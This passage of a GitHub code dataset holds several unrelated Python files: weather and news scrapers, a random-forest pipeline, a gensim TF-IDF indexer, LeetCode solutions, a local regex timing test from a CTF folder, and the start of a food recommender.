sentences selected\n \"\"\"\n final_sentences = {}\n \n total_sentences = len(sentences_weight)\n # how many sentences to retain\n num_sentences_selected = math.ceil(float(0.20) * total_sentences)\n \n # key of selected sentences (# order of sentence in paragraph)\n #sentences_selected_key = []\n \n # dictionary of all sentences \n sentences_dict = {}\n flag = 0\n \n # select num_sentences_selected # of sentences from list of sentence weights\n selected_keys = [k for k,v in sentence_weight[0:num_sentences_selected]]\n\n for sent_key in selected_keys:\n pre_processed_sentence = labeled_sentences[sent_key]\n \n processed_sentence = pre_processed_sentence.lower() #lowercase\n processed_sentence = processed_sentence.replace('[[','') # remove brackets indicating links\n processed_sentence = processed_sentence.replace(']]','')\n processed_sentence = processed_sentence.replace(']','')\n processed_sentence = processed_sentence.replace('[','')\n processed_sentence = re.sub('(? None:\n self._filepath = filepath\n self._reader = reader\n self._filter_algorithm = timestamp_filter_algorithm\n\n logger.debug(\n f\"Creating instance:\"\n f\"filepath: {self._filepath}\"\n f\"reader: {self._reader}\"\n f\"timestamp_filter_algorithm: {self._filter_algorithm}\"\n )\n\n def load_weather(self,\n start_datetime: Optional[pd.Timestamp] = None,\n end_datetime: Optional[pd.Timestamp] = None\n ) -> pd.DataFrame:\n logger.debug(\"Loading weather\")\n weather_df = self._load_from_file()\n weather_df = self._filter_by_timestamp(end_datetime, start_datetime, weather_df)\n return weather_df\n\n def _load_from_file(self):\n filepath = os.path.abspath(self._filepath)\n logger.debug(f\"Loading weather from {filepath}\")\n with open(filepath, mode=\"rb\") as input_file:\n weather_df = self._reader.read_weather_from_binary_stream(input_file)\n return weather_df\n\n def _filter_by_timestamp(self, end_datetime, start_datetime, weather_df):\n weather_df = self._filter_algorithm.filter_df_by_min_max_timestamp(\n weather_df,\n start_datetime,\n end_datetime\n )\n return weather_df\n","repo_name":"cool-soft/boiler","sub_path":"src/boiler/weather/io/sync_weather_file_loader.py","file_name":"sync_weather_file_loader.py","file_ext":"py","file_size_in_byte":2037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"8516097451","text":"\nfrom colorama import Fore\nimport requests\nfrom bs4 import BeautifulSoup\n\ncity = input(\"Enter city name: \")\n\nurl = \"https://www.google.com/search?q=\" + \"weather\" + city\nhtml = requests.get(url).content\n\nsoup = BeautifulSoup(html, 'html.parser')\ntemp = soup.find('div', attrs={'class': 'BNeawe iBp4i AP7Wnd'}).text\ntime_sky = soup.find('div', attrs={'class': 'BNeawe tAd8D AP7Wnd'}).text\n\ndata_split = time_sky.split('\\n')\ntime = data_split[0]\nsky = data_split[1]\n\nprint(Fore.BLUE + city.capitalize(),\":\")\nprint(\"Temperature is\", temp)\nprint(\"Today the sky is:\", sky)\nprint(\"Today is\", time)\n\n#issue was here -> \ntemp_digit = temp[:-1]\ntemp_digit = int(temp_digit[:-1])\n\nif 41 <= temp_digit <= 59:\n print(Fore.RED + \"You're going to need a jacket today!\")\n\nelif temp_digit < 41:\n print(\"Maybe you should wear a winter coat instead!\")\n\nelse:\n print(Fore.YELLOW + \"You don't need a jacket today. Enjoy the weather!\")\n","repo_name":"hafssarawi/DoYouNeedAJacket22","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"32396071923","text":"\"\"\"\nThis script runs the whole pipeline including training, prediction and performance metrics evaluation\nin k-fold cross-validation.\n\nFile: run_pipeline.py\nAuthor: Jana Rieger\nCreated on: 24.08.2020\n\"\"\"\n\nimport os\nimport pickle\n\nfrom src.RF import rf_config\nfrom src.RF.utils.evaluate_function import evaluate_and_save_to_csv\nfrom src.RF.utils.predict_function import predict_and_save\nfrom src.RF.utils.prepare_samples import get_balanced_samples\nfrom src.RF.utils.train_function import train_and_save\nfrom src.generalutils import helper\nfrom sklearn import preprocessing\n\nprint('run_pipeline.py', os.getcwd())\n\n\ndef main():\n ################################################\n # SET PARAMETERS FOR TUNING\n ################################################\n n_estimators_list = [50, 100] # list of number of trees in forest\n crossvalidation = False\n ################################################\n\n # general parameter\n version = rf_config.RF_VERSION\n models_dir = rf_config.MODELS_DIR\n data_dir = rf_config.DATA_DIR\n feature_names = rf_config.FEATURE_NAMES\n # additional parameters - predicting\n feature_filenames = rf_config.FEATURE_FILENAMES # list of the feature inputs to the network in the right order\n predictions_dir = rf_config.PREDICTIONS_DIR\n # additional parameters - evaluation\n label_filename = rf_config.LABEL_FILENAMES[rf_config.H_LEVEL]\n class_dict = rf_config.CLASS_DICTS[rf_config.H_LEVEL]\n\n print('-' * 100)\n print('version', version)\n print('number of estimators list', n_estimators_list)\n print('crossvalidation', crossvalidation)\n print('*' * 100)\n\n # -----------------------------------------------------------\n # PREPARING MODEL SAMPLES\n # -----------------------------------------------------------\n if crossvalidation:\n # LOADING MODEL DATA\n X, y = get_balanced_samples(feature_names=feature_names)\n folds = helper.load_json(os.path.join('src', 'BRAVENET', 'xval_folds_example.json'))\n for f, fold in folds.items():\n if f not in ['0', '1', '2', '3']:\n continue\n print('FOLD %s' % f)\n datasets = [*fold]\n models_dir = os.path.join(rf_config.MODELS_DIR, 'fold' + str(f))\n predictions_dir = os.path.join(rf_config.PREDICTIONS_DIR, 'fold' + str(f))\n # Get train dfs.\n train_X = X[X['patient_id'].isin(fold['train']['working'])].drop('patient_id', axis=1)\n train_y = y[y['patient_id'].isin(fold['train']['working'])].drop('patient_id', axis=1)\n # Scaling\n scaler = preprocessing.MinMaxScaler().fit(train_X)\n train_X = scaler.transform(train_X)\n # Patient numbers\n n_train_patients = len(fold['train']['working'])\n\n # -----------------------------------------------------------\n # RUNNING PIPELINE\n # -----------------------------------------------------------\n pipeline(n_estimators_list=n_estimators_list, train_X=train_X, train_y=train_y, scaler=scaler,\n class_dict=class_dict, datasets=datasets, predictions_dir=predictions_dir, models_dir=models_dir,\n data_dir=data_dir, version=version, feature_filenames=feature_filenames,\n label_filename=label_filename, patients=fold, n_train_patients=n_train_patients)\n else:\n # LOADING MODEL DATA\n patients = rf_config.PATIENTS\n datasets = ['train', 'val', 'test']\n X, y = get_balanced_samples(feature_names=feature_names)\n # Get train dfs\n train_X = X[X['patient_id'].isin(patients['train']['working'])].drop('patient_id', axis=1)\n train_y = y[y['patient_id'].isin(patients['train']['working'])].drop('patient_id', axis=1)\n # Scaling\n scaler = preprocessing.MinMaxScaler().fit(train_X)\n train_X = scaler.transform(train_X)\n # Patient numbers\n n_train_patients = len(patients['train']['working'])\n\n # -----------------------------------------------------------\n # RUNNING PIPELINE\n # -----------------------------------------------------------\n pipeline(n_estimators_list=n_estimators_list, train_X=train_X, train_y=train_y, scaler=scaler,\n class_dict=class_dict, datasets=datasets, predictions_dir=predictions_dir, models_dir=models_dir,\n data_dir=data_dir, version=version, feature_filenames=feature_filenames,\n label_filename=label_filename, patients=patients, n_train_patients=n_train_patients)\n print('DONE')\n\n\ndef pipeline(n_estimators_list, train_X, train_y, scaler, class_dict, datasets, predictions_dir, models_dir, data_dir,\n version, feature_filenames, label_filename, patients, n_train_patients):\n # -----------------------------------------------------------\n # PREPARE FILES FOR STORING RESULTS\n # -----------------------------------------------------------\n all_classes = [*class_dict]\n all_classes = list(map(str, all_classes))\n result_files_dict = {}\n for dataset in datasets:\n if not os.path.exists(os.path.join(predictions_dir, dataset)):\n os.makedirs(os.path.join(predictions_dir, dataset))\n result_file = rf_config.get_complete_result_table_filepath(predictions_dir, dataset)\n result_file_per_patient = rf_config.get_complete_result_table_per_patient_filepath(predictions_dir, dataset)\n header_row = ['number of estimators',\n 'num pat ' + dataset, 'value',\n 'acc ' + dataset,\n 'dice macro ' + dataset,\n 'dice macro wo 0 ' + dataset,\n 'dice macro wo 0 and 1 ' + dataset,\n 'avg acc ' + dataset,\n 'avg acc wo 0 ' + dataset,\n 'avg acc wo 0 and 1 ' + dataset,\n 'dice binary ' + dataset] + all_classes\n header_row_patient = ['number of estimators',\n 'patient',\n 'acc ' + dataset,\n 'dice macro ' + dataset,\n 'dice macro wo 0 ' + dataset,\n 'dice macro wo 0 and 1 ' + dataset,\n 'avg acc ' + dataset,\n 'avg acc wo 0 ' + dataset,\n 'avg acc wo 0 and 1 ' + dataset,\n 'dice binary ' + dataset] + all_classes\n helper.write_to_csv(result_file, [header_row])\n helper.write_to_csv(result_file_per_patient, [header_row_patient])\n result_files_dict[dataset] = [result_file, result_file_per_patient]\n\n # -----------------------------------------------------------\n # FINE GRID FOR PARAMETER TUNING\n # -----------------------------------------------------------\n for n_estimators in n_estimators_list:\n run_name = rf_config.get_run_name(version=version, n_estimators=n_estimators,\n n_patients_train=n_train_patients)\n train_metadata_filepath = rf_config.get_train_metadata_filepath(models_dir, run_name)\n model_filepath = rf_config.get_model_filepath(models_dir, run_name)\n # -----------------------------------------------------------\n # TRAIN RF AND SAVE MODEL AND RESULTS\n # -----------------------------------------------------------\n train_and_save(version, models_dir, n_estimators=n_estimators,\n n_train_patients=n_train_patients,\n train_X=train_X, train_y=train_y,\n scaler=scaler, run_name=run_name, train_metadata_filepath=train_metadata_filepath,\n model_filepath=model_filepath)\n print('_' * 100)\n print('Training completed.')\n print('_' * 100)\n # -----------------------------------------------------------\n # PREDICT AND EVALUATE\n # -----------------------------------------------------------\n print('Starting prediction...')\n print('_' * 100)\n train_metadata = helper.load_model_metadata(train_metadata_filepath)\n model = pickle.load(open(model_filepath, 'rb'))\n for dataset in datasets:\n print('DATASET', dataset)\n set_patients = patients[dataset]['working']\n for patient in set_patients:\n print('-' * 100)\n predict_and_save(version=version, n_estimators=n_estimators,\n n_patients_train=n_train_patients, patient=patient,\n data_dir=data_dir, dataset=dataset,\n feature_filenames=feature_filenames,\n models_dir=models_dir, predictions_dir=predictions_dir, run_name=run_name,\n model=model, train_metadata=train_metadata)\n print('_' * 100)\n print('Prediction in %s dataset completed.' % dataset)\n print('_' * 100)\n # -----------------------------------------------------------\n # EVALUATE\n # -----------------------------------------------------------\n print('Starting evaluation in %s dataset...' % dataset)\n print('_' * 100)\n evaluate_and_save_to_csv(version=version, n_estimators=n_estimators,\n n_patients_train=n_train_patients, data_dir=data_dir,\n dataset=dataset,\n models_dir=models_dir, predictions_dir=predictions_dir,\n patients=set_patients, result_file=result_files_dict[dataset][0],\n result_file_per_patient=result_files_dict[dataset][1],\n label_load_name=label_filename, washed=False)\n print('_' * 100)\n print('Evaluation in %s dataset completed.' % dataset)\n print('_' * 100)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"jana-rieger/vessel_annotation","sub_path":"src/RF/run_pipeline.py","file_name":"run_pipeline.py","file_ext":"py","file_size_in_byte":10127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"25621471111","text":"from operator import pos\nfrom typing import List\n\n\nclass Solution:\n def oddEvenJumps(self, arr: List[int]) -> int:\n n = len(arr)\n next_larger = [-1 for i in range(n)]\n next_smaller = [-1 for i in range(n)]\n\n data = sorted([[a, i] for i, a in enumerate(arr)],\n key=lambda x: [x[0], x[1]])\n stack = []\n next_larger[n-1], next_smaller[n-1] = n-1, n-1\n for i in range(n):\n while stack and data[i][1] > stack[-1]:\n next_larger[stack.pop()] = data[i][1]\n stack.append(data[i][1])\n\n data = sorted([[a, i] for i, a in enumerate(arr)],\n key=lambda x: [-x[0], x[1]])\n stack = []\n for i in range(n):\n while stack and data[i][1] > stack[-1]:\n next_smaller[stack.pop()] = data[i][1]\n stack.append(data[i][1])\n\n dp = [[True for i in range(n)] for j in range(2)]\n result = 1\n for i in range(n-2, -1, -1):\n if next_larger[i] == -1:\n dp[0][i] = False\n else:\n dp[0][i] = dp[1][next_larger[i]]\n if dp[0][i]:\n result += 1\n if next_smaller[i] == -1:\n dp[1][i] = False\n else:\n dp[1][i] = dp[0][next_smaller[i]]\n return result\n\n\nprint(Solution().oddEvenJumps(\n [2, 3, 1, 1, 4]), 2)\n","repo_name":"HandsomeCoder/leetcode-practice","sub_path":"google/odd-even-jump.py","file_name":"odd-even-jump.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"39078180063","text":"from selenium import webdriver\r\nfrom selenium.webdriver.common.keys import Keys\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.support.wait import WebDriverWait\r\nfrom selenium.webdriver.support.expected_conditions import presence_of_element_located\r\nfrom selenium.webdriver.common.action_chains import ActionChains\r\nfrom time import sleep\r\nimport bs4\r\nimport requests\r\nimport json\r\n\r\n\r\n#setting up the wwebdriver\r\ndriver=webdriver.Chrome('E:\\My_projects\\web scraping\\chromedriver.exe')\r\ndriver.get(\"https://www.alchourouk.com/%D8%A7%D9%84%D8%B1%D8%A6%D9%8A%D8%B3%D9%8A%D8%A9\")\r\n\r\n#list of the topic that we want to scrape\r\nl=[\"سياسة\",\"وطنية\",\"جهاتنا\",\"رياضة\"]\r\n\r\n#generate a soup\r\ndef create_soup(url):\r\n page = requests.get(url)\r\n soup = bs4.BeautifulSoup(page.content, \"html.parser\")\r\n return soup\r\n\r\n#get the new from providen url\r\ndef get_event(url):\r\n page = create_soup(url)\r\n events = page.find_all(class_=\"field field--name-body field--type-text-with-summary field--label-hidden field--item\")\r\n event = events[4].text.strip()\r\n return event \r\n\r\n#save news to dict\r\ndef collect_all_data(li,key_word,out_data):\r\n out_data[key_word]=dict()\r\n for i in range(len(li)):\r\n out_data[key_word][i+1]=get_event(li[i])\r\n\r\n\r\n#enter into given keyword then scrape the links of the news to scrape later\r\ndef collect_data_from_one_page(key_word,out_data):\r\n out=set()\r\n link=driver.find_element_by_link_text(key_word)\r\n link.click()\r\n sleep(5)\r\n print(key_word+\"\\n\\n\")\r\n elems = driver.find_elements_by_css_selector(\".fieldset [href]\")\r\n links = [elem.get_attribute('href') for elem in elems]\r\n for li in links:\r\n out.add(li)\r\n driver.back()\r\n sleep(2)\r\n li=list(out)\r\n collect_all_data(li,key_word,out_data)\r\n\r\n\r\n#scrape all data\r\ndef scrape(l):\r\n out_data = dict()\r\n for key_word in l:\r\n collect_data_from_one_page(key_word,out_data)\r\n \r\n return out_data\r\n\r\n\r\nif __name__==\"__main__\":\r\n out_data=scrape(l)\r\n data_file = open(\"data.json\", \"w\")\r\n json.dump(out_data, data_file, ensure_ascii=False)\r\n data_file.close()\r\n\r\n","repo_name":"fawzeus/alshourouk-scrapper","sub_path":"app/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":2235,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"70444039192","text":"# def oddEven(A,Odd,Even):\n# for i in A : \n# if (i%2==0):\n# Even.append(i)\n# else:\n# Odd.append(i)\n\nOdd =list()\nEven = list() #even=[]\nX = [1,2,3,4,5,6,7,8,9]\nfor i in X: \n if (i%2==0):\n Even.append(i)\n else:\n Odd.append(i)\n\nprint(Odd)\nprint(Even)\n\n# class MyClass:\n# a = 6 \n# b = 2 \n# c = 4 \n\n# print(a+b+c)","repo_name":"Mudit2003/Coding","sub_path":"Python/OddEven.py","file_name":"OddEven.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"41418361706","text":"import bz2\nimport os\nimport jsonlines\nimport pickle\nimport typing as t\nfrom pathlib import Path\n\nfrom gensim import utils\nfrom gensim.corpora import Dictionary\nfrom gensim.corpora.mmcorpus import MmCorpus\nfrom gensim.models import TfidfModel\nfrom gensim.parsing.preprocessing import PorterStemmer\nfrom tqdm import tqdm\n\nfrom medical_ir.config import (\n BIOPAPERS_JSON_PATH,\n BOW_PATH,\n DATA_FOLDER,\n TFIDF_VECTORIZER,\n INDECES_FOLDER,\n DEFAULT_STOPWORDS,\n BIOPAPERS_WOUT_ABSTRACT_JSON_PATH,\n BIOPAPERS_W_ABSTRACT_JSON_PATH,\n BOW_LENGTH,\n)\nfrom medical_ir.config import (\n spaces,\n num_alpha,\n alpha_num,\n non_letters,\n numbers,\n html_tags,\n punctuation,\n)\n\np = PorterStemmer()\n\n\ndef clean_and_tokenize_text(input_corpus: str, min_len: int = 3) -> t.List[str]:\n \"\"\"\n Inspiration from gensim preprocess_text with the addition of medical stop words\n\n Parameters\n ----------\n input_corpus: str\n Input string to be tokenized\n\n Returns\n -------\n s_tokens: list\n List of stemmed tokens\n \"\"\"\n s = input_corpus.lower()\n s = utils.to_unicode(s)\n # Remove HTML Tags\n s = html_tags.sub(\"\", s)\n # Remove punctuation:\n s = punctuation.sub(\"\", s)\n # Remove non-letters:\n s = non_letters.sub(\" \", s)\n # Remove digits in letters:\n s = alpha_num.sub(\" \", s)\n s = num_alpha.sub(\" \", s)\n # Remove white space:\n s = spaces.sub(\" \", s)\n # Remove numbers:\n s = numbers.sub(\"\", s)\n # Remove stopwords and small words:\n s_tokens = []\n for curr_word in s.split(\" \"):\n if curr_word not in DEFAULT_STOPWORDS:\n if len(curr_word) >= min_len:\n s_tokens.append(p.stem(curr_word))\n\n return s_tokens\n\n\nclass BiopapersCorpus:\n def __init__(\n self,\n bow_dictionary: Dictionary,\n path_to_JSONL_index: Path,\n tfidf_vectorizer: t.Union[TfidfModel, None] = None,\n metadata_index_outpath: t.Union[Path, None] = None,\n ):\n self.bow_dictionary = bow_dictionary\n self.index_path = path_to_JSONL_index\n self.tfidf_vectorizer = tfidf_vectorizer\n self.metadata_index_outpath = metadata_index_outpath\n # Initialize id count to 0\n self.count_doc_id = 0\n\n def __iter__(self):\n for json_line in tqdm(\n jsonlines.open(self.index_path), f\"Iterating through corpora {self.index_path}\"\n ):\n # Initialize empty abstract and title:\n abstract = \"\"\n title = \"\"\n # Check if title and abstracts are available:\n if json_line[\"title\"]:\n title = json_line[\"title\"]\n if json_line[\"abstract\"]:\n abstract = json_line[\"abstract\"]\n # Add abstract and title together\n title_abstract_str = title + \" \" + abstract\n tokens_list = clean_and_tokenize_text(title_abstract_str)\n # If Vectorization mode on:\n if self.tfidf_vectorizer:\n # If file for indexing was given:\n if self.metadata_index_outpath:\n # Extract relevant info:\n doi = json_line[\"doi\"]\n title = json_line[\"title\"]\n url = json_line[\"doi_url\"]\n journal = json_line[\"journal_name\"]\n authors_dict = json_line[\"z_authors\"]\n year = json_line[\"year\"]\n # Add metadata to dictionary\n metadata_dict = {\n self.count_doc_id: {\n \"doi\": doi,\n \"title\": title,\n \"url\": url,\n \"journal\": journal,\n \"authors\": authors_dict,\n \"year\": year,\n }\n }\n # Create key in gz pickle file:\n with jsonlines.open(self.metadata_index_outpath, \"a\") as outfile:\n outfile.write(metadata_dict)\n # Increasing count:\n self.count_doc_id += 1\n # Convert BOW corpus to TFIDF:\n yield self.tfidf_vectorizer[self.bow_dictionary.doc2bow(tokens_list)]\n # Else we are converting to BOW:\n else:\n yield self.bow_dictionary.doc2bow(tokens_list)\n\n\nclass BiopapersBOW:\n \"\"\"\n Intelligent implementation of corpora which opens one document at the time\n \"\"\"\n\n def __init__(self, path_to_JSONL_index: Path):\n self.index_path = path_to_JSONL_index\n\n def __iter__(self):\n for json_line in jsonlines.open(self.index_path):\n # Initialize empty abstract and title:\n abstract = \"\"\n title = \"\"\n # Check if title and abstracts are available:\n if json_line[\"title\"]:\n title = json_line[\"title\"]\n if json_line[\"abstract\"]:\n abstract = json_line[\"abstract\"]\n # Add abstract and title together\n title_abstract_str = title + \" \" + abstract\n # Clean text:\n tokens_list = clean_and_tokenize_text(title_abstract_str)\n # Create a dictionary\n yield Dictionary([tokens_list])\n\n\ndef create_bow_from_biopapers(\n no_below: int = 2,\n no_above: float = 0.5,\n path_to_jsonl_index: Path = BIOPAPERS_JSON_PATH,\n outfile: Path = BOW_PATH,\n keep_n: int = BOW_LENGTH,\n prune_at_idx: int = 100000,\n) -> Dictionary:\n \"\"\"\n Create bag of words dictionary from jsonl biopapers\n\n Parameters\n ----------\n no_below: int\n Minimum number of appearances of a word\n no_above: float\n Max frequency of a word\n path_to_jsonl_index: Path\n Path to jsonlines papers\n outfile: Path\n Path to bow file\n prune_at_idx: int\n Index multiple at which to prune the dictionary. Eg. if prune_at_idx the\n index will be pruned at 1000, 2000, 3000 and so on.\n\n Returns\n -------\n collection_dictionary: Dictionary\n Gensim Bow dictionary\n \"\"\"\n # Initialize variables:\n biopapers_iter = BiopapersBOW(path_to_jsonl_index)\n collection_dictionary = dict()\n # Iterate through collection and build vocabulary\n for i, paper_vocabulary in enumerate(\n tqdm(biopapers_iter, desc=\"Building bag of words\")\n ):\n # If first paper:\n if i == 0:\n collection_dictionary = paper_vocabulary\n else:\n collection_dictionary.merge_with(paper_vocabulary)\n if i % prune_at_idx == 0:\n # Filter words:\n collection_dictionary.filter_extremes(no_below=1, no_above=no_above, keep_n=keep_n*2)\n # Final Filter words:\n collection_dictionary.filter_extremes(no_below=no_below, no_above=no_above, keep_n=keep_n)\n # Save collection to file:\n collection_dictionary.save(str(outfile))\n\n return collection_dictionary\n\n\ndef create_tfidf_from_papers(\n path_to_jsonl_index: Path = BIOPAPERS_JSON_PATH,\n path_to_bow: Path = BOW_PATH,\n outfile: Path = TFIDF_VECTORIZER,\n) -> TfidfModel:\n \"\"\"\n Creates TFIDF model from BOW corpora.\n\n Parameters\n ----------\n path_to_jsonl_index: Path\n Path to json lines index\n path_to_bow: Path\n Path to Bag of Words Dictionary\n outfile: Path\n Path to TFIDF vectorizer\n\n Returns\n -------\n tfidf_model: TfidfModel\n Gensim TFIDF Model\n \"\"\"\n # Load dictionary\n dictionary = Dictionary.load(str(path_to_bow))\n # Load corpus generator\n corpus = BiopapersCorpus(dictionary, path_to_jsonl_index)\n # Train TFIDF\n tfidf_model = TfidfModel(corpus)\n # Save TFIDF model to file:\n tfidf_model.save(str(outfile))\n\n return tfidf_model\n\n\ndef convert_corpus_to_sparse_tfidf(\n metadata_index_outpath: Path,\n vectorized_corpus_outpath: Path,\n path_to_jsonl_index: Path = BIOPAPERS_JSON_PATH,\n path_to_bow: Path = BOW_PATH,\n tfidf_vectorizer: Path = TFIDF_VECTORIZER,\n):\n \"\"\"\n Convert corpora of a specific category into a tfidf sparse matrix.\n\n It saves:\n 1. MM Corpus sparse matrix indexed by id\n 2. metadata index as gz pickle file.\n\n Parameters\n ----------\n metadata_index_outpath: Path\n Path to metadata index (without extension)\n vectorized_corpus_outpath: Path\n Path to corpus matrix, does not require extension\n path_to_jsonl_index: Path\n Path to jsonl_index for that specific category\n path_to_bow: Path\n Path to BOW dictionary\n tfidf_vectorizer:\n Path to TFIDF model for vectorization of BOW corpus\n \"\"\"\n # Load dictionary\n if path_to_bow.exists():\n bow_dictionary = Dictionary.load(str(path_to_bow))\n else:\n bow_dictionary = create_bow_from_biopapers()\n # Load tfidf model:\n if tfidf_vectorizer.exists():\n tfidf_model = TfidfModel.load(str(tfidf_vectorizer))\n else:\n tfidf_model = create_tfidf_from_papers()\n # Add pickle suffix:\n metadata_index_outpath = metadata_index_outpath.with_suffix(\".jsonl\")\n # Load corpus generator:\n tfidf_corpus = BiopapersCorpus(\n bow_dictionary=bow_dictionary,\n path_to_JSONL_index=path_to_jsonl_index,\n tfidf_vectorizer=tfidf_model,\n metadata_index_outpath=metadata_index_outpath,\n )\n # Save corpus and index to file:\n MmCorpus.serialize(str(vectorized_corpus_outpath), tfidf_corpus)\n # Convert Jsonlines to pickle bz2\n # convert_jsonl_to_pickle_bz(metadata_index_outpath)\n\n\ndef convert_jsonl_to_pickle_bz(jsonl_path: Path, delete_jsonl: bool = True):\n \"\"\"\n Converts jsonl metadata to pickle bz and optionally removes the original file.\n\n Parameters\n ----------\n jsonl_path: Path\n Path to Jsonlines metadata\n delete_jsonl: Bool\n Whether to delete the jsonlines file after the conversion. Default = True\n \"\"\"\n pkl_bz_outfile = jsonl_path.with_suffix(\".bz2\")\n metadata_dict = {}\n # Open jsonlines and update dictionary:\n with jsonlines.open(jsonl_path) as reader:\n for i, metadata_obj in enumerate(tqdm(reader, desc=f\"Building metadata {pkl_bz_outfile}\"),):\n if i == 0:\n metadata_dict = dict(metadata_obj)\n else:\n metadata_dict = {**metadata_dict, **dict(metadata_obj)}\n # TODO this stalls for large files above 4GB\n # Write pickle to compressed BZ2:\n with bz2.BZ2File(pkl_bz_outfile, \"wb\") as writer:\n pickle.dump(metadata_dict, writer, pickle.HIGHEST_PROTOCOL)\n\n # Remove Jsonlines file\n if delete_jsonl:\n try:\n os.remove(jsonl_path)\n except:\n print(\"Failed to delete Jsonlines file.\")\n\n\ndef convert_indeces_to_tfidf(indeces_folder: Path = INDECES_FOLDER):\n # Obtain list of all indeces:\n index_list = list(indeces_folder.rglob(\"index_*\"))\n # For index path\n for index_path in index_list:\n category = str(index_path.stem).split(\"index_\")[-1]\n metadata_outpath = indeces_folder / f\"{category}_metadata\"\n corpus_outpath = indeces_folder / f\"{category}_corpus.mm\"\n\n convert_corpus_to_sparse_tfidf(\n metadata_index_outpath=metadata_outpath,\n vectorized_corpus_outpath=corpus_outpath,\n path_to_jsonl_index=index_path,\n )\n\ndef convert_str_to_tfidf(\n input_str: str,\n path_to_bow: Path = BOW_PATH,\n tfidf_vectorizer: Path = TFIDF_VECTORIZER,\n) -> (list, int):\n \"\"\"\n Converts a string to bow and then to tfidf\n\n Parameters\n ----------\n input_str: str\n String to be converted. eg. from query\n path_to_bow: Path\n Path to BOW dictionary\n tfidf_vectorizer:\n Path to TFIDF model for vectorization of BOW corpus\n\n Returns\n -------\n tfidf_query: list\n List of vectorized tokens and relative tfidf value.\n bow_len: int\n Integer representing the length of the bow dictionary.\n\n \"\"\"\n # Load dictionary\n if path_to_bow.exists():\n bow_dictionary = Dictionary.load(str(path_to_bow))\n else:\n bow_dictionary = create_bow_from_biopapers()\n # Load tfidf model:\n if tfidf_vectorizer.exists():\n tfidf_model = TfidfModel.load(str(tfidf_vectorizer))\n else:\n tfidf_model = create_tfidf_from_papers()\n # Tokenize query:\n query_tokens = clean_and_tokenize_text(input_str)\n # Convert query to bow:\n query_bow = bow_dictionary.doc2bow(query_tokens)\n # Convert bow query to Tfidf:\n tfidf_query = tfidf_model[query_bow]\n\n return tfidf_query, len(bow_dictionary)\n\n\nif __name__ == \"__main__\":\n convert_indeces_to_tfidf()\n","repo_name":"universvm/MediSia","sub_path":"django_backend/medical_ir/index/tfidf_vectorizer.py","file_name":"tfidf_vectorizer.py","file_ext":"py","file_size_in_byte":12694,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"5"} +{"seq_id":"794538345","text":"import re\nimport time\n\nregex = r'([a-z]+)\\1{50}'\nstring = 'abcdefghijklmnopqrstuvwxyz' * 30000\n\nstart_time = time.time()\nmatch = re.match(regex, string)\nend_time = time.time()\n\nduration = end_time - start_time\nprint(f\"Matching duration: {duration:.4f} seconds\")\n","repo_name":"Walid-Berrouk/BSides_Algiers2k23_Write-Ups","sub_path":"web/Flags_Shop/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"5"} +{"seq_id":"6197720862","text":"from unittest import result\nimport pandas as pd\nfrom app.model.user import User\nfrom app.model.rekomendasi import Rekomendasi\nfrom app.model.makanan import Makanan\nfrom app.module import makanancontroller\nimport csv\nfrom app import response, app, db\nfrom flask import request, render_template, redirect, url_for\nimport numpy as np\nfrom ast import literal_eval\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom nltk.corpus import stopwords\nimport re\nimport random\nimport nltk\nfrom nltk.corpus import stopwords\nfrom nltk import word_tokenize\nfrom nltk.stem import PorterStemmer\nfrom nltk.stem import WordNetLemmatizer\n\n\nclean_spcl = re.compile('[/(){}\\[\\]\\|@,;]')\nclean_symbol = re.compile('[^0-9a-z #+_]')\nstopworda = set(stopwords.words('indonesian'))\n\ndef clean_text(text):\n text = text.lower() # lowercase text\n #text = clean_spcl.sub(' ', text)\n #text = clean_symbol.sub('', text)\n #text = [item.strip() for item in text.split(\",\")]\n text = ' '.join(word for word in text.split() if word not in stopworda) # hapus stopword\n return text\n\ndef clean_split(text):\n text = text.strip()\n text = text.lower().split(', ')\n return text\n\n\ndef preprocessing(pref_bahan, df_u, df_user):\n #Preprocessing preferensi bahan\n #pref_bahan_clean = clean_text_series(df_u['pref_bahan'])\n input = pref_bahan\n clean = [item.strip() for item in input.split(\",\")]\n print(\"ini clean:\",clean)\n combined = [item.replace(\" \",\"\") for item in clean]\n print(\"ini combined:\",combined)\n print(type(combined))\n combined = ', '.join(map(lambda x: \"'\" + x + \"'\", combined))\n print(\"ini combined quoted:\",combined)\n print(type(combined))\n # Buat kolom tambahan untuk data description yang telah dibersihkan \n df2 = [{'nama_makanan': 'preferensi user', 'energi': 0, 'protein': 0, 'lemak': 0, 'karbo': 0, 'natrium': 0,'bahan_bahan':'', 'bahan_stemmed': combined, 'langkah':''}]\n print(df2)\n df_user = df_user.append(df2, ignore_index = True)\n print(df_user)\n return df_user\n\n\ndef tfidf_func(df_user):\n # PROSES TF - IDF\n #tf = TfidfVectorizer(analyzer='word', ngram_range=(1, 3), min_df=0, stop_words='indonesian')\n tf = TfidfVectorizer(analyzer='word', ngram_range=(1,1), min_df=0, binary=True)\n tfidf_matrix = tf.fit_transform(df_user['bahan_stemmed'])\n return tfidf_matrix\n\n\ndef cossim_func(tfidf_matrix):\n # PROSES SIMILARITY\n cos_sim = cosine_similarity(tfidf_matrix, tfidf_matrix)\n return cos_sim\n\n\ndef recommendation_result(pref_preprocessing, cosine_sim = cossim_func):\n # Set nama makanan 